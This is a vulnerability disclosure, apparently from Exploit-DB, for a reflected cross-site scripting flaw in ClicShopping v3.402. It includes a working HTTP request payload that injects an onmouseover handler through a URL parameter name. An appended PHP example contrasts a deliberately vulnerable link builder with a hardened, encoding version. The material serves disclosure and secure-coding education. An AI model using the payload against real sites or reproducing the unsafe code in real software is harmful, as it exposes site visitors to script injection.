ClicShopping v3.402 – Cross-Site Scripting (XSS)

  • Author: nu11secur1ty
    Date: 2023-03-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51135/
  • ## Title: ClicShopping v3.402 - Cross-Site Scripting (XSS) 
    ## Author: nu11secur1ty
    ## Date: 11.20.2022
    ## Vendor: https://www.clicshopping.org/forum/
    ## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402
    ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3
    
    ## Description:
    The name of an arbitrarily supplied URL parameter is copied into the
    value of an HTML tag attribute that is enclosed in double quotation
    marks.
    An attacker can trick users into opening a very dangerous link, obtain
    sensitive information, or destroy some components of your system.
    
    ## STATUS: HIGH Vulnerability
    
    [+] Payload:
    
    ```js
    GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1
    HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    
    ```
    
    ## Reproduce:
    [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)
    
    ## Proof and Exploit:
    [href](https://streamable.com/rzpgsu)
    
    ## Time spent
    `1:00`
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html and https://www.exploit-db.com/
    home page: https://www.nu11secur1ty.com/
    nu11secur1ty <http://nu11secur1ty.com/>
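
The pattern the description names, a query parameter name copied into a double-quoted attribute value, shown beside a hardened version. This is an added example, not code from ClicShopping or from the advisory's author; the function names, the link markup and the sample parameter are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (not ClicShopping code): rebuild the current query
// string so it can be placed inside a double-quoted href attribute.

/** Vulnerable pattern: parameter names and values reach the attribute raw. */
function build_link_unsafe(string $path, array $params): string
{
    $pairs = [];
    foreach ($params as $name => $value) {
        // Neither the name nor the value is encoded for URL or HTML context.
        $pairs[] = $name . '=' . $value;
    }
    return '<a href="' . $path . '?' . implode('&', $pairs) . '">Refine search</a>';
}

/** Hardened: percent-encode each component, then escape for the attribute. */
function build_link_safe(string $path, array $params): string
{
    // http_build_query() percent-encodes keys as well as values.
    $query = http_build_query($params, '', '&', PHP_QUERY_RFC3986);
    $url = $path . '?' . $query;
    // ENT_QUOTES escapes both " and ', so the value cannot close the attribute.
    $attr = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $attr . '">Refine search</a>';
}

// Constructed input: the parameter *name* carries a double quote followed by
// an extra attribute, the same shape as the request in the advisory.
$params = [
    'Search' => '',
    'k"onmouseover="alert(1)' => '1',
];

// Unsafe output: the quote in the name ends href and starts a new attribute.
echo build_link_unsafe('index.php', $params), PHP_EOL;

// Safe output: the name stays inside href as inert, encoded text.
echo build_link_safe('index.php', $params), PHP_EOL;
```

Parameter names need the same output encoding as values; filtering only the values of known parameters leaves this path open.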